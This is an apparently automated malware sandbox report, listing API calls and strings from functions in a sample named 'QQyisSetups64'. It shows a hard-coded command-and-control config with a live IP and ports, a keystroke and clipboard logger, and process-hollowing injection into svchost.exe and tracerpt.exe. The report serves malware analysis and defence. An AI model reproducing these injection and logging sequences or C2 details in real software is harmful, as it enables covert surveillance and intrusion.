Instruction ID: afb72937f9c9ce214a566e41d5ab619accdb81a82dd2b561c0b19e9e9fca84f6
Opcode Fuzzy Hash: c61b9da7888c13092d72a826444d718a347c39ff058e72cdf6096974a2198557
Instruction Fuzzy Hash: 19E0ECB5A01604EFEB08BBA0C945E7E7776AF05705F208059E1026B3A1DA75A944EF24

Function 03796403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0379641B

Part of subcall function 03798E5B: __mtinitlocknum.LIBCMT ref: 03798E71
Part of subcall function 03798E5B: __amsg_exit.LIBCMT ref: 03798E7D
Part of subcall function 03798E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03793F06,0000000D,037A6340,00000008,03793FFF,00000000,?,037910F0,00000000,037A6278,00000008,03791155,?), ref: 03798E85

__tzset_nolock.LIBCMT ref: 0379642C

Part of subcall function 03795D22: __lock.LIBCMT ref: 03795D44
Part of subcall function 03795D22: ____lc_codepage_func.LIBCMT ref: 03795D8B
Part of subcall function 03795D22: __getenv_helper_nolock.LIBCMT ref: 03795DAD
Part of subcall function 03795D22: _free.LIBCMT ref: 03795DE4
Part of subcall function 03795D22: _strlen.LIBCMT ref: 03795DEB
Part of subcall function 03795D22: __malloc_crt.LIBCMT ref: 03795DF2
Part of subcall function 03795D22: _strlen.LIBCMT ref: 03795E08
Part of subcall function 03795D22: _strcpy_s.LIBCMT ref: 03795E16
Part of subcall function 03795D22: __invoke_watson.LIBCMT ref: 03795E2B
Part of subcall function 03795D22: _free.LIBCMT ref: 03795E3A

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: 0b394f981064968f9e126261eb497380b9283979ee21f3d14849ebd3645ef572
Instruction ID: e8bb111b120f70e227ee65ef22454e64cd2491f9158af7cf79829ebac6ecf116
Opcode Fuzzy Hash: 0b394f981064968f9e126261eb497380b9283979ee21f3d14849ebd3645ef572
Instruction Fuzzy Hash: 18E0C23C841710EAEE22FFF1B60AF4D72B06B89F31F50834BE040690D0DB740202C652

Function 02C8474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 02C84755

Part of subcall function 02C83260: __wcsrev.LIBCMT ref: 02CA0655

Strings

|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 02C84750

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __wcsrevlstrlen
String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
API String ID: 4062721203-291094236
Opcode ID: 26cddb4ed2cd679b75300efaa28b55bdbc1b9f97591ad6195d229d382f8a7a7a
Instruction ID: 7cac3e93d4fa51d5ce9483c377fe93354d854235069c65375944047bb02b3812
Opcode Fuzzy Hash: 26cddb4ed2cd679b75300efaa28b55bdbc1b9f97591ad6195d229d382f8a7a7a
Instruction Fuzzy Hash: 43C08CB2288208DFFA0136D5900C72C3368EB22F69F509435E505C6402E652CD2097F2

Function 03786EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80000001,03786E9A), ref: 03786EC9
RegCloseKey.ADVAPI32(75A373E0), ref: 03786ED2

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5497cd9599029fe43a7f826c3cf11654b966b6b3b7a4ca59ace4a2b9433491d2
Instruction ID: 682dd8c9aba7f1f1cf3588a33ca2373fcc6f2b7939bb2aa4b26ee35d9792d6ae
Opcode Fuzzy Hash: 5497cd9599029fe43a7f826c3cf11654b966b6b3b7a4ca59ace4a2b9433491d2
Instruction Fuzzy Hash: 43C04C72D0142857CA10E7A4ED4494A77B85B8C110F1184C2A604A3114C634AD418F90

Function 02C8608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 02C860A0

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e6123c027a9a3db6dd746900d1cd5b9637e6d24baa007dcee09daba2c21f8a8c
Instruction ID: b6cd287cc550659279e7b711860314435ad5b82c0abc232d6161f521a1af82ea
Opcode Fuzzy Hash: e6123c027a9a3db6dd746900d1cd5b9637e6d24baa007dcee09daba2c21f8a8c
Instruction Fuzzy Hash: CAE02274C08205EACF11CA41D18CBFD73B46B50708F20918DD002AB480D3742B04CAC4

Function 02C85E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32 ref: 02C9F0F9

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
Instruction ID: 6b55702c6d9d5dbb1946f79e326efbaf59539ae41fbdd7843f6ef2bee382d1c2
Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
Instruction Fuzzy Hash: AEC08C70C4CB9CE18C2069131D0D27CB2E44B44A59F2094EFE84BB6CC0A1A526D0C6EE

Function 02C84274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 02CA0693

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: bb3e69414ba11e6911276100639b5ce6f1d27cad50d50593baf7689d0f110ccd
Instruction ID: 0f2cece0115dd170b91a16a9f72bee97c5acd121337a2bba9b04c4658f99f4f3
Opcode Fuzzy Hash: bb3e69414ba11e6911276100639b5ce6f1d27cad50d50593baf7689d0f110ccd
Instruction Fuzzy Hash: F6C04828B8C226E9F86422862C2FB3419043B47FADF709727F223AD8C358900480C6A7

Function 02C860DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02C9FAB1

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: ba86a7c5707d582c86a3a5819ac6beca6f2a4553fb53bd5026179ff24a9dc747
Instruction ID: 6c7c37dad574cf943c6472323c73d0b820be1e4e1bd04566ae0e43526dea4fb5
Opcode Fuzzy Hash: ba86a7c5707d582c86a3a5819ac6beca6f2a4553fb53bd5026179ff24a9dc747
Instruction Fuzzy Hash: FBD012B4104900D7D700AB51C48C71AB2E6BF44300F20C919C45ED2E10C63CE841CA91

Function 02C9F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 02C9F63D

Memory Dump Source

Source File: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 736ede7d76a5cc52b0552456f0c32e8c5e696298af75a6c6a4be6e1ab7a05efa
Instruction ID: bbba33c90a97f9003943eecad8a99afa4755c01afb6b57d81630c7986d0b0253
Opcode Fuzzy Hash: 736ede7d76a5cc52b0552456f0c32e8c5e696298af75a6c6a4be6e1ab7a05efa
Instruction Fuzzy Hash: 239002387C4501AA56010922788C7552754560468134419199403C0400D61083549954

Function 02C85EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 02C85EB2

Part of subcall function 02C86F17: _malloc.LIBCMT ref: 02C86F31

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Sleep_malloc
String ID:
API String ID: 617756273-0
Opcode ID: 2a76ea4aae0fbe997f371a7061f41686705ad99607b3b71d3f1d4627375894b4
Instruction ID: b352fbfa3509c93807e2320f5fe119ed952e25cc078ad3b327ad8af56ae5872d
Opcode Fuzzy Hash: 2a76ea4aae0fbe997f371a7061f41686705ad99607b3b71d3f1d4627375894b4
Instruction Fuzzy Hash: 3FD0A9B2D042028BABA02DA104DC22E60622780288FA48139C20AC2800D6624A54C7D2

Non-executed Functions

Function 0378E850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0378E8A9
Sleep.KERNEL32(00000001,?,?,?,0378604D), ref: 0378E8B3
GetTickCount.KERNEL32 ref: 0378E8BF
GetTickCount.KERNEL32 ref: 0378E8D2
InterlockedExchange.KERNEL32(037B1F08,00000000), ref: 0378E8DA
OpenClipboard.USER32(00000000), ref: 0378E8E2
GetClipboardData.USER32(0000000D), ref: 0378E8EA
GlobalSize.KERNEL32(00000000), ref: 0378E8FB
GlobalLock.KERNEL32(00000000), ref: 0378E90C
wsprintfW.USER32 ref: 0378E985
_memset.LIBCMT ref: 0378E9A3
GlobalUnlock.KERNEL32(00000000), ref: 0378E9AC
CloseClipboard.USER32 ref: 0378E9B2
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0378E9CA
CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0378E9E4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378EA02
lstrlenW.KERNEL32(037A5B48,?,00000000), ref: 0378EA16
WriteFile.KERNEL32(00000000,037A5B48,00000000), ref: 0378EA25
CloseHandle.KERNEL32(00000000), ref: 0378EA2C
ReleaseMutex.KERNEL32(00000000), ref: 0378EA38
GetKeyState.USER32(00000014), ref: 0378EABC
lstrlenW.KERNEL32(037AB4A8), ref: 0378EB0B
wsprintfW.USER32 ref: 0378EB1D
lstrlenW.KERNEL32(037AB4D0), ref: 0378EB3E
lstrlenW.KERNEL32(037AB4D0), ref: 0378EB61
wsprintfW.USER32 ref: 0378EB7F
wsprintfW.USER32 ref: 0378EB95
wsprintfW.USER32 ref: 0378EBBF
lstrlenW.KERNEL32(00000000), ref: 0378EC0B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0378EC21
CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0378EC3B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378EC59
lstrlenW.KERNEL32(00000000,?,00000000), ref: 0378EC69
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0378EC74
CloseHandle.KERNEL32(00000000), ref: 0378EC7B
ReleaseMutex.KERNEL32(00000000), ref: 0378EC88

Strings

[esc], xrefs: 0378EB4E, 0378EB77, 0378EB8D, 0378EBB7
[, xrefs: 0378E97F
%s%s, xrefs: 0378EB17, 0378EB79
%s%s, xrefs: 0378EB8F
%s%s, xrefs: 0378EBB9

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
String ID: [$%s%s$%s%s$%s%s$[esc]
API String ID: 1637302245-2373594894
Opcode ID: dad7224858f5df0912f0ff751203eb9f693cb05cfda88280263a43cf3d0c096a
Instruction ID: 120bc9caad228c4f13a3389448eec3eb5bfbc11b2b094cb4ad511753848bee4b
Opcode Fuzzy Hash: dad7224858f5df0912f0ff751203eb9f693cb05cfda88280263a43cf3d0c096a
Instruction Fuzzy Hash: AAC1F670640700AFD720FF64DC88FAA7BF4FB88710F448A59E69AD6285E7789580CF61

Function 037877E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03787804
_memset.LIBCMT ref: 03787850
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03787864

Part of subcall function 03788720: _vswprintf_s.LIBCMT ref: 03788731

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787893
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 037878DA

Part of subcall function 03787740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037878FC), ref: 03787756
Part of subcall function 03787740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037878FC,?,?,?,?,?,?,771B0630), ref: 0378775D

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378790A
_memset.LIBCMT ref: 03787923
LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378793B
GetProcAddress.KERNEL32(00000000), ref: 03787944
LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787956
GetProcAddress.KERNEL32(00000000), ref: 03787959
LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378796B
GetProcAddress.KERNEL32(00000000), ref: 0378796E
LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787980
GetProcAddress.KERNEL32(00000000), ref: 03787983
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378798B
GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787992
_memset.LIBCMT ref: 037879B4
GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,771B0630), ref: 037879CA
VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 037879FF
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03787A1B
VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03787A43
VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03787A58
WriteProcessMemory.KERNEL32(00000000,00000000,037876F0,00001000,00000000), ref: 03787A72
VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03787A90
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03787AA1
Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,771B0630), ref: 03787ABA
VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03787AD6
VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03787AE8
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,771B0630), ref: 03787AF1

Strings

%s%s, xrefs: 03787876, 037878AA
WinExec, xrefs: 0378795B
OpenProcess, xrefs: 03787931
ExitProcess, xrefs: 03787946
Windows\System32\svchost.exe, xrefs: 037878A4
WaitForSingleObject, xrefs: 03787970
D, xrefs: 03787840
Windows\SysWOW64\svchost.exe, xrefs: 03787870
Kernel32.dll, xrefs: 03787936, 0378794B, 03787960, 03787975

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
API String ID: 4176418925-3213446972
Opcode ID: 309523c0e0fbe1f8327e5236e7ebc3e7c66e87fb68149e9b7b1b37100180ec32
Instruction ID: 513c792430fc4d8dae3dfe975b5c4a42e0741de747b975da0a26063b977fd3bb
Opcode Fuzzy Hash: 309523c0e0fbe1f8327e5236e7ebc3e7c66e87fb68149e9b7b1b37100180ec32
Instruction Fuzzy Hash: 2581E2B1A807187BEB24EB65DC49FDF777CAFC5B00F104598F209A6181DAB49A80CA64

Function 02C85820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02C85849
_memset.LIBCMT ref: 02C85868
_memset.LIBCMT ref: 02C8589D
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02C858B1

Part of subcall function 02C859E0: _vswprintf_s.LIBCMT ref: 02C859F1

GetFileAttributesA.KERNEL32(?), ref: 02C858E0
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02C85928
VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C8594E
WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C85968
GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C85987
SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C859A2
ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C859C1

Strings

%s%s, xrefs: 02C858C3, 02C858F7
Windows\SysWOW64\tracerpt.exe, xrefs: 02C858BD
D, xrefs: 02C8587C
Windows\System32\tracerpt.exe, xrefs: 02C858EB

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
API String ID: 2170139861-1986163084
Opcode ID: 2428ec778ef749dc6d3b246522c510d44890db6c99238e892586f3f8710a2f48
Instruction ID: 41d8d4d88d5f3fe8eb206c420c51a55a6acd3c993d8556b948871893c0160d6b
Opcode Fuzzy Hash: 2428ec778ef749dc6d3b246522c510d44890db6c99238e892586f3f8710a2f48
Instruction Fuzzy Hash: D74175B0A40308AFEB25DF60DC45FAA77B8AF44744F50859DB64DA7180DBB09A84CFA4

Function 03787E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03787E73
_memset.LIBCMT ref: 03787E9F
_memset.LIBCMT ref: 03787ED4
GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03787EE8

Part of subcall function 03788720: _vswprintf_s.LIBCMT ref: 03788731

GetFileAttributesA.KERNEL32(?), ref: 03787F15
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03787F65
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03787F92
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03787FAA
GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03787FCC
SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03787FEA
ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03787FFF

Strings

%s%s, xrefs: 03787EFA, 03787F2C
D, xrefs: 03787EB3
Windows\System32\svchost.exe, xrefs: 03787F26
Windows\SysWOW64\svchost.exe, xrefs: 03787EEE

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
API String ID: 2170139861-2473635271
Opcode ID: dc2b3c0aa7b3ead911939c6cbd15d8bd285b157addaf8bfd3a82b14337f84876
Instruction ID: f69802d0518d7cecf4de3c2d43abfd64697f0ceb166fbe7c448441e168f36781
Opcode Fuzzy Hash: dc2b3c0aa7b3ead911939c6cbd15d8bd285b157addaf8bfd3a82b14337f84876
Instruction Fuzzy Hash: 2F41C5B1A40358AFDB24EB61DC85FDE77BCAB84B00F1082D9F60DA6181DAB45B81CF54

Function 0378E4F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,037B0D80,771AE010,771B2FA0,771B0F00,?,03786028,?,?), ref: 0378E519
lstrcatW.KERNEL32(037B0D80,\DisplaySessionContainers.log,?,03786028,?,?), ref: 0378E529
CreateMutexW.KERNEL32(00000000,00000000,037B0D80,?,03786028,?,?), ref: 0378E538
WaitForSingleObject.KERNEL32(00000000,000000FF,?,03786028,?,?), ref: 0378E546
CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03786028,?,?), ref: 0378E563
GetFileSize.KERNEL32(00000000,00000000,?,03786028,?,?), ref: 0378E56E
CloseHandle.KERNEL32(00000000,?,03786028,?,?), ref: 0378E577
DeleteFileW.KERNEL32(037B0D80,?,03786028,?,?), ref: 0378E58A
ReleaseMutex.KERNEL32(00000000,?,03786028,?,?), ref: 0378E597
DirectInput8Create.DINPUT8(?,00000800,037A4934,037B1220,00000000,?,03786028,?,?), ref: 0378E5B2
GetTickCount.KERNEL32 ref: 0378E665
GetKeyState.USER32(00000014), ref: 0378E672

Strings

<, xrefs: 0378E637
\DisplaySessionContainers.log, xrefs: 0378E51F

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
String ID: <$\DisplaySessionContainers.log
